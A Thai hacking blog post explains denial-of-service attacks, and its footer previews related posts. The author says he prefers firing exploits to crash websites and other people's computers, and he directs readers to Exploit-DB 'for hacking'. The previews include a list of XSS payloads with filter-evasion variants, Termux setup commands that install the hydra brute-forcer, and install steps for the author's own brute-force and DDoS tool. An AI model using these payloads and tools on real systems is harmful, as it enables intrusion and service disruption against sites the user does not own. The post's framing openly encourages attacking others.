Dos Attack คืออะไร

  หากจะพูดถึง Dos ทุกคนอาจนึกถึงการยิงเน็ตบ้าน หรือการยิงเว็บไซต์ให้มันล่มหรือใช้งานไม่ได้ แต่ที่จริงแล้ว มันไม่ได้มีแต่การยิงเน็ตเท่านั้น ที่จะทำให้เว็บล้ม หรือเน็ตบ้านใช้งานไม่ได้

   ก่อนที่เราจะมาพูดถึงวิธีโจมตี เรามาทำความรู้จักก่อนว่า DDos คืออะไร

Dos คืออะไร

  DDod หรือ Denial of Service ในวิชาการคอมพิวเตอร์ การโจมตีโดยปฏิเสธการให้บริการ เป็นความพยายามทำให้เครื่องหรือทรัพยากรเครือข่ายสำหรับผู้ใช้เป้าหมายใช้บริการไม่ได้ เช่น ขัดขวางหรือชะลอบริการของแม่ข่ายที่เชื่อมโยงกับอินเทอร์เน็ตอย่างชั่วคราวหรือถาวร ส่วน การโจมตีโดยปฏิเสธการให้บริการแบบกระจาย (distributed denial-of-service (DDoS) attack) คือการโจมตีดังกล่าวซึ่งแหล่งต้นทางเป็นเลขที่อยู่ไอพีมากกว่าหนึ่งหมายเลข และมักจะเป็นพันหมายเลขฃ

  อาชญากรผู้โจมตีมักมุ่งเป้าไปยังเว็บไซต์หรือบริการซึ่งตั้งอยู่ในเว็บเซิร์ฟเวอร์ที่มีการเข้าชมสูงอย่างเช่น ธนาคาร เกตเวย์ชำระบัตรเครดิต โดยมีแรงจูงใจเบื้องหลังเป็นการแก้แค้น การแบล็กเมล หรือการเคลื่อนไหวทางการเมือง เป็นต้น, และสิ่งนี้คือจุดเริ่มต้นของ Hacker ที่พยายามทำให้เซิร์ฟเวอร์นั้นไม่สามารถให้บริการกับผู้ใช้งานได้

  ที่จริง การทำ Dos Attack ไม่จำเป็นที่จะต้องเป็น DDos หรือยิงเน็ตเสมอไป การเกิด Dos นั้น มันมาจากสาเหตุหลายอย่าง เช่น ความผิดพลาดของซอร์ฟแวร์ การที่ตัว Server ทำงานหนักเกินไป และอื่นๆอีกมากมาย แต่นึกไม่ออก

วิธีการและเทคนิกการโจมตี


  วิธีการที่รับความนิยม ส่วนใหญ่จะเป็นการทำ DDos เพราะว่าทำง่าย หลัการโจมตีแบบ DDos นั้น จะเป็นการยิงแพ็คเก็จรัวๆ หลายๆครั้ง เพื่อทำให้ช่องทางอินเตอร์เน็ตเต็ม หรือ ทำให้ซอร์ฟแวร์ทำงานหนัก หากจะมาถามผมว่า สอนยิงเน็ตให้หน่อย ล่ะก็ ผมจะไม่สอน แต่ผมจะทิ้งลิ้งวีดีโอให้นำไปศึกษานะครับ

  ส่วนตัวผมเอง ถ้าอยากจะล้มเว็บอะไร หรือ อยากจะทำให้คอมคนอื่นเจ้ง ผมจะยิง Exploit เข้าไป แทนการยิง DDos ไป เพราะว่าถ้ายิงเน็ตแบบธรรมดา แค่รีเร้าเตอร์ก็แก้ได้แล้ว และการยิง DDos มันกินทรัพยากร cpu มากๆ แต่การยิง Exploit มันง่ายมาก แค่รันโค้ดไม่กี่บรรทัด ก็ล้มเว็บได้แล้ว ในบางครั้ง Exploit ก็ไม่สามารถทำอะไรกับเว็บได้เลย เพราะเว็บไซต์บางเว็บได้อุดช่องโหว่ไปแล้ว หากต้องการหา Exploit สำหรับแฮก หรือล้มเว็บ ก็สามารถหาได้จากเว็บไซต์ Exploit-DB ของ offensive security ที่รวม Exploit หรือช่องโหว่ต่างๆให้แฮกกัน 

ความคิดเห็น

แสดงความคิดเห็น

โพสต์ยอดนิยมจากบล็อกนี้

วิธีใช้ Termux สำหรับการแฮก

รูปภาพ
Termux Terminal Termux คือแอพพิเคชั่น ที่เอาไว้เปิด Linux Terminal แอพนี้สามารถใช้งานได้โดยไม่ต้องรูท สามารถใช้งานได้บน Android 5.0 ขึ้นไป Termux สามารถดาวโหลดได้บน playstore Setup แอพ Termux Terminal หลังจากได้โหลดแอพ Termux มาเรียบร้อย มันจะมาแค่ตัวแอพ แต่ไม่มี Tools สำหรับแฮกเพราะฉนั้นจึงจำเป็นที่จะต้อง Setup และ Install แพ็คเก็ตที่จำเป็น คำสั่ง Setup และ Install แพ็คเก็ต $apt-get upgrade $termux-setup-storage $apt-get install git $apt-get install wget $pip install wordlist $apt-get install python python2 $apt-get install hydra $apt-get dist-upgrade คำสั่งลง Tools Scrip $git clone (ตามด้วยลิ้งค์ GitHub) $wget (ตามด้วยลิ้งค์ GitHub)
อ่านเพิ่มเติม

XSS Payload for Hacking ครั้งที่ 1

XSS Payload for Hacking ครั้งที่ 1 XSS in HTML/Applications XSS Basic Basic payload < script > alert ( ' XSS ' ) < / script > < scr < script > ipt > alert ( ' XSS ' ) < / scr < script > ipt > " ><script>alert('XSS')</script> " >< script > alert ( String . fromCharCode ( 88 , 83 , 83 )) < / script > Img payload < img src = x onerror = alert ( ' XSS ' ); > < img src = x onerror = alert ( ' XSS ' ) // < img src = x onerror = alert ( String . fromCharCode ( 88 , 83 , 83 )); > < img src = x oneonerrorrror = alert ( String . fromCharCode ( 88 , 83 , 83 )); > < img src = x : alert (alt) onerror = eval (src) alt = xss > " ><img src=x onerror=alert('XSS');> " >< img src = x onerror = alert ( String . fromCharCode ( 88 , 83 , 83 )); > Svg payload < svg onload = alert ( 1 ) > < svg / onload
อ่านเพิ่มเติม

วิธีติดตั้ง HPAS1369

รูปภาพ
HPAS1369 คือ Tools ที่ถูกสร้างเพื่อเอาไว้ทดสอบระบบ ถูกสร้างขึ้นโดย Zero Hacker (ผมเอง) ซึ้งสคริปนี้มีฟรีเจอร์อยู่ 4 อย่างคือ -Brute Force หารหัส -DDos Attack ยิงเว็บ ยิงเน็ต -NMap PortScanner แสกนพอร์ต NMap -Install Tools Hacking ติดตั้ง Tools อื่น คุณสามารถนำไปแฮกและทดสอบระบบได้ Tools นี้ไม่จำเป็นต้องรูท วิธีติดตั้ง $apt-get upgrade $apt-get install git python python2 $git clone https://github.com/DedSecCyber/HPAS1369 $cd HPAS1369 $sh install.sh มันก็จะติดตั้งโดยอัตโนมัท วิธีใช้ $python2 HPAS1369. py
อ่านเพิ่มเติม